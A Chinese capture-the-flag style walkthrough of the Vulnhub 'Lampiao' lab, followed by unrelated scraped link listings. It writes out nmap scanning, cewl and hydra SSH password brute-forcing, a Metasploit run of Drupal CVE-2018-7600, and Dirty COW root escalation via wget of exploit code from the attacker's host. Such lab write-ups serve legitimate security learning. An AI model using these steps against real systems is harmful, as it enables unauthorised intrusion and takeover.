靶机地址:https://www.vulnhub.com/entry/lampiao-1,249/

靶机难度:中等

工具:kalilinux; 一个灵活的脑子 ; 一双手

目标:得到root权限&找到flag.txt

作者:木木北星

声明:这里使用的技术仅用于学习交流目的,如果列出的技术用于其他任何目标,我概不负责。

第一步信息收集

信息收集在整个渗透过程中占80%左右。在虚拟机中确认攻击的ip地址,nmap获取目标ip地址(有很多工具我个人比较喜欢nmap)

使用命令:nmap -sP 192.168.222.0/24

解释:(ip地址是你自己的物理机ip第三个小数点后面改0/24)

得到ip后开始探索ip地址开放端口和一些服务。继续用nmap全端口扫描:

使用命令:nmap -sS -sV -T5 -A -p- 192.168.222.137

可以看出靶机上有三个可用的开放端口22、80、1898端口。这里对22端口,尝试ssh弱口令爆破,并没有结果,这里就不多说ssh弱口令爆破了,基本上百度都能搜得到,使用msf、hydra等,后期文章攻击也会使用到。由于目标靶机上的端口80可用,我们在浏览器上打开了目标计算机的IP,它显示了一个有趣的页面:

F12 查看这是一个静态页面,没发现什么有用的信息所以换1898端口:

可以分别进入两个页面:

第一栏点进去内容翻译后并没有什么有效的信息,第二栏点进去细心的我发现了这是node/3,这是第三栏的内容,说明还有第二栏的内容没有显示,修改下页面试试。

发现两个文件:

第一个文件内是一个音频,语音内容为:user tiago,则用户名为:tiago

第二个文件是一个二维码,扫码后的内容是一句话:Try harder!Muahuahua...没用的信息

接下来开始用工具对网站进行爆破扫描...(也可以使用御剑)

使用命令: dirb http://192.168.222.137:1898 -o out

找到一个robots.txt的文件,后台打开看看:

经过漫长的信息收集终于在CHANGELOG.txt文件中发现了网站的基本信息

这是一个基于Drupal 7的博客或是社交网站。

cewl:通过爬行网站获取关键信息创建一个密码字典

hydra:神器九头蛇,网上有太多资料

使用命令:cewl http://192.168.222.137:1898/?q=node/1 -w mmbx.txt

hydra -l tiago -P mmbx.txt 192.168.222.137 ssh

先利用cewl来生成一份结合网站目标的社工性质的密码字典、不理解的可以搜索网上搜索cewl学习,然后九头蛇暴力破解得到用户密码:

用户: tiago

密码: Virgulino

重要的来了!!!!使用用户名tiago进行ssh登陆连接,成功连接,但是不能用sudo su进行提权!!

第二部shell提权

现在利用收集到的信息进行提权

刚刚在文件收集到这个网站是2016年的Durpal7

这边我们查询到Drupal漏洞CVE-2018-7600,我们尝试使用MSF进行渗透试试。

先输入指令:msfconsole

再search CVE-2018-7600

然后再use这个指令

rhosts设置靶机IP

rport设置靶机端口

run开跑

成功通过漏洞渗透进入系统,获得低权限用户,和前面ssh登陆的tiago用户权限类似,这是另外一种渗透的方法,可以好好学习。

下一步要找到反弹shell获取root权限,通过网上对Durpal 7版本2016年都可以使用dirty(脏牛)进行提权,非常有名的一个漏洞提权目前已经修复,仅供参考学习。

命令:searchsploit dirty查找脏牛提权shell,利用40847.cpp

思路是继续开启本地pthon服务,然后把40847.cp发送到靶机上

命令:python -m http.server 8879 开启服务

网站登录端口(这里注意,ip地址是你kali的IP地址)

命令:wget http://192.168.222.128 :8879/40847.cpp

将40847.cp上传到靶机上

命令:g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil

  1. -Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
  2. -pedantic 允许发出ANSI/ISO C标准所列出的所有警告
  3. -O2编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
  4. -std=c++11就是用按C++2011标准来编译的
  5. -pthread 在Linux中要用到多线程时,需要链接pthread库
  6. -o dcow gcc生成的目标文件,名字为dcow

执行gcc编译可执行文件,可直接提权。

打开文件成功看到靶机root的密码

直接登录root

输入ls(列出目前工作目录所含之文件及子目录)

发现flag最后查看文件

最后:如果本人有哪些步骤没有做的精细的望大佬勿喷,本人也喜欢结实五湖四海的朋友一起探讨学习技术。

有兴趣的可以斯我

挑战全网最详细靶机教程——vulnhub靶机实战 lampiao【适合刚接触的新人学习】相关推荐

  1. 挑战全网最详细靶机教程——vulnhub靶机实战vulnhub Tr0ll: 1【适合刚接触的新人学习】

    靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/ 靶机难度:简单 靶机发布日期:2014年8月14日 靶机描述:Tr0ll的灵感来自OSCP实验室中不断摇 ...

  2. 鸿蒙系统电视k歌,华为电视怎么k歌?全网最详细的教程在这里

    原标题:华为电视怎么k歌?全网最详细的教程在这里 利用智能电视在家k歌,是一个很不错的娱乐活动.那么,家里的华为怎么电视k歌?需要准备什么设备?下面就为大家分享一份详细教程,看完 两分钟快速开启K歌模 ...

  3. vscode全网最详细使用教程

    vscode下载地址 官网下载:https://code.visualstudio.com/或者直接点击**我的资源**下载 VScode使用教程 安装教程 鼠标左键双击,即可运行安装程序 一:同意协 ...

  4. 全网最详细的渗透测试靶机实操步骤——vulnhub靶机实战(七)IMF【包含了sql注入,文件上传,gif图片木马制作,缓冲区溢出漏洞sploit等诸多知识点的靶机,超多干货】

    靶机地址:https://www.vulnhub.com/entry/imf-1,162/ 靶机难度:中级(CTF) 靶机发布日期:2016年10月30日 靶机描述:欢迎使用" IMF&qu ...

  5. UIApp教程(全网最详细的教程来啦)

    UIApp教程 1. UIApp概述 1.1 UIApp简介 UIApp是一款基于React Native开发的跨平台移动应用开发框架. UIApp提供了丰富的组件库和模板,可以快速构建高质量的移动应 ...

  6. lombok如何给属性设置_你不得不会的Lombok全面详细讲解,全网最详细的教程

    读者范围: 如果你使用过Lombok你可能只使用了部分功能,那么这里列举了所有功能,你继续阅读能完善这方面的知识: 如果你还没用用过,甚至不知道这是什么,那么对不起,你已经被技术淘汰了,这里有一份详尽 ...

  7. pikachu全网最详细安装教程

    提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一.phpStudy V8版本安装步骤 二.pikachu安装 前言 pikachu是一个包含了常见的web安全漏洞的 ...

  8. 【从零开始玩量化17】如何python+QMT完成自动化交易?(全网最详细入门教程)

    一.什么是QMT 此部分为扫盲内容,有一定了解者可以跳过. 概念 它是一款量化交易客户端软件,由一家叫做迅投公司出品,可以直接登录你的券商账号进行股票交易,但与同花顺/通信达不同的是,它暴露了基于py ...

  9. Netty 全网最详细的教程! 没有之一!

    Netty 入门 文章目录 Netty 入门 入门案例 1.服务器端代码 2.客户端代码 3.运行流程 组件解释 使用组件 EventLoop 创建一个EventLoopServer 创建一个Clie ...

最新文章

  1. IDEA如何导入多个maven依赖的项目
  2. Python测试框架pytest(05)fixture - error和failed、fixture实例化、多个fixture
  3. windows mobile C# net3.5 如何捕捉Arrow的CheckBox的KeyDown事件?
  4. esp8266单片机透传_基于WeMos D1(ESP8266)的校园卡门禁系统
  5. jmeter 安装详解
  6. 再谈Bellman-Ford
  7. Servlet3.0
  8. Android stdio安装
  9. 三菱PlC程序大型项目QCPU+QD77MS16 包含一套完整的电气开发系统资料(包含plc程序,触摸屏程序,伺服模块设置程序,程序开发地址规划表)
  10. “一键淘宝”将淘宝网店免费转移到手机客户端教程
  11. 字节跳动岗位薪酬体系曝光,看完感叹:不服不行
  12. 如何设置打开图片的默认方式
  13. 多伦多大学计算机专业硕士,多伦多大学计算机硕士专业 看你满足录取要求吗...
  14. libdmtx结合OpenCV识别DataMatrix二维码
  15. 如何使用Win10自带的录屏功能以及如何查找到视频存放的位置
  16. 区块链正在颠覆的18个行业
  17. 用matlab代码写一下jackknife方法的校正步骤?、
  18. 服务器系统壁纸,云服务器壁纸
  19. 全球名校AI课程库(27)| MIT麻省理工 · 数据结构与算法设计课程『Design and Analysis of Algorithms』
  20. 【证券】什么是开仓、持仓和平仓?

热门文章

  1. ARM裸机的知识点总结---------10、SD卡启动详解
  2. pip+conda更换国内源(ubuntu18.04+win10)
  3. 考研英语复习如何能提高写作熟练度?
  4. 2015年考研英语复习23问23答
  5. sql去重 ,4种查询数量方法
  6. 大数据课堂笔记 day5
  7. 科技 |『2017CES』雷蛇发布三面屏笔记本
  8. 计算最长公共子序列LCS(Python实现)
  9. PICO高管专访:关于PICO 4硬件、内容、定价、海外布局的一切解答
  10. 虚拟服务器8核,4核和8核云服务器有什么区别